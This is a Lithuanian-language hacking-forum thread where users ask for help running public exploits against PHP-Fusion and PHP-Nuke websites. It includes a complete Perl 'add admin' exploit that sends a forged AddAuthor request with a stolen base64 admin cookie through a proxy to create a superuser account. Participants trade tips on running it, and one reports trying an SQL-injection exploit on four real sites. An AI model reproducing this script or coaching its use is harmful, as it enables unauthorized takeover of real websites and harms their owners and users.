Exploit

[DeMO]

Sveiki visi..

Gal kas gali padėti ištaisyti klaidą šiame php exploite?
http://www.milw0rm.com/exploits/1796

Jau dvi valandas sėdžiu ieškau kas ne taip, žiūriu į kitus php sploitus, kad nelabai randu kas ne taip.. rodo

admin:
hash:

bet nerodo hash'o ir admin nick.. kas ne taip.. ? Kur ten klaida.

[GODhack]

tikrai nera klaidos nepavyksta tau jo panaudoti tikriausiai.

[DeMO]

Na bet blin, kas čia ne taip tada.. :/
Rašau va taip:

php.exe php-fus_sql_injec.php www.saitas.lt / Vardas Slaptazodis

Ir rodo, kad coocies gaunu, bet hash nerodo admino..

[VilMixas]

Na viska perskaiciau ir bandziau paleist, bet kazka netaip padariau, nu as pasakysiu kaip dariau o jus jei galit pasakykit kas blogaj....
Susiradau exploita tada jy nusikopinau y notepad padariau .pl pletiny o tada komandu eilutej parasiau
C:\Documents and Settings\User>perl\bin\perl.exe
C:\Documents and Settings\User>exploitas.pl

Nu nelabaj zinau kas netaip ? gal ten kazka per perla reikia daryt?

[DeMO]

Na viska perskaiciau ir bandziau paleist, bet kazka netaip padariau, nu as pasakysiu kaip dariau o jus jei galit pasakykit kas blogaj....
Susiradau exploita tada jy nusikopinau y notepad padariau .pl pletiny o tada komandu eilutej parasiau
C:\Documents and Settings\User>perl\bin\perl.exe
C:\Documents and Settings\User>exploitas.pl

Nu nelabaj zinau kas netaip ? gal ten kazka per perla reikia daryt?

Nukopijuok čia exploitą, pažiūrėsiu.. Gal exploitas ne Perl?
A.. taigi jomajo.. neteisingai rašai..

[VilMixas]

#!/usr/bin/perl
use LWP::UserAgent;

print "========================================\n";
print " PHP-NUKE all versions add admin exploit\n";
print " Exploit coded by matrix_killer\n";
print " Greetz to all omega-team members\n";
print " See the sourece for more information\n";
print "========================================\n";


print "Enter host: "; #example:www.host.org

my $host=<STDIN>;

chomp ($host);

print "Enter username: "; #example:Lamer

my $user=<STDIN>;

chomp ($user);

print "Enter pass: "; #example:lamer

my $pass=<STDIN>;

chomp ($pass);

print "Enter base64 username and md5 hash: ";

my $base64=<STDIN>;

chomp ($base64);


my $ua = new LWP::UserAgent;
$ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port
#Change the base64 text to the base 64 username and password
my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64";

my $res = $ua->request(new HTTP::Request POST => $xpl);
print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

[VilMixas]

TAJ KAS NE TAIP?

[DeMO]

TAJ KAS NE TAIP?

rašyk taip:

cd C:\perl\bin\
exploitas.pl

[VilMixas]

Gal skype turi?

[k4r0l1s]

kaip vadinasi kompiliavimo programa?
is kur atsisiut?

[VilMixas]

Nu padariau taip kaip sakei ir man parase "Can.t open perl script "C:\exploitas.pl": No such file or directory"
Kaip cia suprast? Tipo netox failas ar direktorija...?

[k4r0l1s]

jo paziurek ar tikrai ten yra tas exploidas

[VilMixas]

jau paleidau, tik db kita problema ten praso hosto username password....
o is kur as galiu zinot?Tas exploitas php fusion lauzt ane?
paskaiciau ir supratau kad ne tokio man exploit reikia...

[DeMO]

tikrai nera klaidos nepavyksta tau jo panaudoti tikriausiai.

God, išbandžiau ant keturių php-fusion saitų. Nothing.. Nerodo.. bet lyg ir viską teisingai surašau.. (prieš tai rašiau pavyzdį).
Kaip man su tais exploitais nesiseka..

[VilMixas]

Gal galit pasakyt ka reik west pabrauktose wietose?